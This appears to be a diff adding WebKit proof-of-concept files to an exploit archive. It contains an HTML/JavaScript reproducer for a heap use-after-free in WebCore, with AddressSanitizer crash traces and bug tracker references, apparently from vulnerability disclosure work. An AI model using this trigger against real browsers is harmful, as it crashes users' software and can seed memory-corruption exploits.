+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x337a44a84 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeea84)
+    #3 0x337a587dc in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1027dc)
+    #4 0x32a99bc19 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<296u>, WebCore::HTMLSelectElement>(bmalloc::api::IsoHeap<WebCore::HTMLSelectElement>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x299bc19)
+    #5 0x32a98b873 in WebCore::HTMLSelectElement::create(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298b873)
+    #6 0x3282a61ae in WebCore::selectConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a61ae)
+    #7 0x32829a09f in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29a09f)
+    #8 0x32aa99c58 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a99c58)
+    #9 0x32aa98c8c in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98c8c)
+    #10 0x32aa99619 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a99619)
+    #11 0x32aaec9bc in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aec9bc)
+    #12 0x32aae86c7 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae86c7)
+    #13 0x32aae5cee in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae5cee)
+    #14 0x32aa9f5cc in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f5cc)
+    #15 0x32aa9f15a in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f15a)
+    #16 0x32aa9e364 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9e364)
+    #17 0x32aa9fed7 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9fed7)
+    #18 0x32a438c2e in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2438c2e)
+    #19 0x32ad2eab3 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2eab3)
+    #20 0x32acf81e9 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf81e9)
+    #21 0x32ae3a0c7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e3a0c7)
+    #22 0x32ae36b4e in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e36b4e)
+    #23 0x32adce18e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce18e)
+    #24 0x10b01d87b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
+    #25 0x10b021e06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
+    #26 0x10b0210fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
+    #27 0x10a602ea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
+    #28 0x10a375b7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
+    #29 0x10a37701e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
+Shadow bytes around the buggy address:
+  0x1c24000154f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400015500: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
+  0x1c2400015510: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c2400015520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400015530: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
+=>0x1c2400015540: fa fa fa fa fa fa fa fa fd fd[fd]fd fd fd fd fd
+  0x1c2400015550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400015560: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
+  0x1c2400015570: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2400015580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400015590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==69238==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186918
+Apple product security report ID: 693712353
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45482.html b/exploits/multiple/dos/45482.html
new file mode 100644
index 000000000..10d12a185
--- /dev/null
+++ b/exploits/multiple/dos/45482.html
@@ -0,0 +1,269 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233006 on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<style>
+.class1 { -webkit-mask-box-image-source: url(#foo); }
+</style>
+<script>
+function freememory() {
+ var a;
+ for(var i=0;i<100;i++) {
+   a = new Uint8Array(1024*1024);
+ }
+ document.implementation.createHTMLDocument("doc");
+}
+function jsfuzzer() {
+try { var00097 = document.createElement("source"); } catch(e) { }
+try { var00097.addEventListener("DOMSubtreeModified", eventhandler5); } catch(e) { }
+try { var00097.setAttribute("onsubmit", "eventhandler3()"); } catch(e) { }
+}
+function eventhandler1() {
+/* newvar{htmlvar00027:HTMLDataListElement} */ var htmlvar00027 = document.createElement("datalist"); //HTMLDataListElement
+try { /* */ var var00060 = eventhandler4; } catch(e) { }
+try { htmlvar00010.appendChild(htmlvar00009); } catch(e) { }
+try { document.title = "foo"; } catch(e) { }
+try { htmlvar00027.addEventListener("DOMNodeInsertedIntoDocument", var00060); } catch(e) { }
+try { htmlvar00008.appendChild(htmlvar00027); } catch(e) { }
+freememory();
+}
+function eventhandler4() {
+try { var var00167 = document.createRange(); } catch(e) { }
+try { var00167.setEndAfter(htmlvar00015); } catch(e) { }
+try { var00167.deleteContents(); } catch(e) { }
+}
+function eventhandler5() {
+try { htmlvar00008.setAttribute("onbeforeload", "eventhandler1()"); } catch(e) { }
+try { htmlvar00010.addEventListener("DOMNodeRemovedFromDocument", eventhandler1); } catch(e) { }
+try { /* newvar{var00107:Element} */ var var00107 = htmlvar00004.querySelector("title");  } catch(e) { }
+try { htmlvar00010.replaceWith(var00107); } catch(e) { }
+}
+</script>
+<body onload=jsfuzzer()>
+<li class="class1">a</li>
+<object id="htmlvar00008">
+<param id="htmlvar00009"></param>
+</object>
+<select id="htmlvar00010">
+<option id="htmlvar00015">a</option>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==69151==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800006aa34 at pc 0x00011465061a bp 0x7ffee1997330 sp 0x7ffee1997328
+READ of size 4 at 0x60800006aa34 thread T0
+==69151==WARNING: invalid path to external symbolizer!
+==69151==WARNING: Failed to use and restart external symbolizer!
+    #0 0x114650619 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619)
+    #1 0x116998b2d in WebCore::Node::ensureRareData() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2400b2d)
+    #2 0x116a8e148 in WebCore::Element::ensureElementRareData() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24f6148)
+    #3 0x116aa5e5a in WebCore::Element::resolveComputedStyle() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x250de5a)
+    #4 0x116aa66d8 in WebCore::Element::computedStyle(WebCore::PseudoId) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x250e6d8)
+    #5 0x116f59ee9 in WebCore::HTMLTitleElement::computedTextWithDirection() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29c1ee9)
+    #6 0x116f59db1 in WebCore::HTMLTitleElement::childrenChanged(WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29c1db1)
+    #7 0x116993126 in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fb126)
+    #8 0x116996e05 in WebCore::ContainerNode::replaceAllChildren(WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fee05)
+    #9 0x116b2e058 in WebCore::Node::setTextContent(WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2596058)
+    #10 0x1169e6fb9 in WebCore::Document::setTitle(WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244efb9)
+    #11 0x114dd2ef8 in WebCore::setJSDocumentTitleSetter(JSC::ExecState&, WebCore::JSDocument&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x83aef8)
+    #12 0x114da64b6 in bool WebCore::IDLAttribute<WebCore::JSDocument>::set<&(WebCore::setJSDocumentTitleSetter(JSC::ExecState&, WebCore::JSDocument&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x80e4b6)
+    #13 0x126386f98 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2498f98)
+    #14 0x1263870d1 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24990d1)
+    #15 0x12652e732 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2640732)
+    #16 0x1260256d9 in llint_slow_path_put_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x21376d9)
+    #17 0x123ffc67b in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10e67b)
+    #18 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #19 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #20 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #21 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #22 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+    #23 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
+    #24 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
+    #25 0x116ad19ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
+    #26 0x116accfbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
+    #27 0x116ab0590 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2518590)
+    #28 0x116ac465b in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c65b)
+    #29 0x116ac405e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c05e)
+    #30 0x116ac3aed in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252baed)
+    #31 0x1169a43c9 in WebCore::dispatchChildRemovalEvents(WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x240c3c9)
+    #32 0x116995156 in WebCore::ContainerNode::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fd156)
+    #33 0x116994703 in WebCore::ContainerNode::replaceChild(WebCore::Node&, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fc703)
+    #34 0x116b2896b in WebCore::Node::replaceWith(WTF::Vector<WTF::Variant<WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, WTF::String>, 0ul, WTF::CrashOnOverflow, 16ul>&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259096b)
+    #35 0x114e540ba in WebCore::jsElementPrototypeFunctionReplaceWithBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8bc0ba)
+    #36 0x114e35a87 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionReplaceWithBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89da87)
+    #37 0x17ac3cce176  (<unknown module>)
+    #38 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #39 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #40 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #41 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #42 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #43 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+    #44 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
+    #45 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
+    #46 0x116ad19ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
+    #47 0x116accfbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
+    #48 0x116ab0590 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2518590)
+    #49 0x116ac465b in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c65b)
+    #50 0x116ac405e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c05e)
+    #51 0x116ac3aed in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252baed)
+    #52 0x116b336fd in WebCore::Node::dispatchSubtreeModifiedEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259b6fd)
+    #53 0x116aa08b5 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25088b5)
+    #54 0x116a98e58 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2500e58)
+    #55 0x116a98c15 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2500c15)
+    #56 0x114e49c37 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8b1c37)
+    #57 0x114e30ba7 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x898ba7)
+    #58 0x17ac3cce176  (<unknown module>)
+    #59 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #60 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #61 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #62 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #63 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #64 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #65 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+    #66 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
+    #67 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
+    #68 0x116ad19ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
+    #69 0x116accfbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
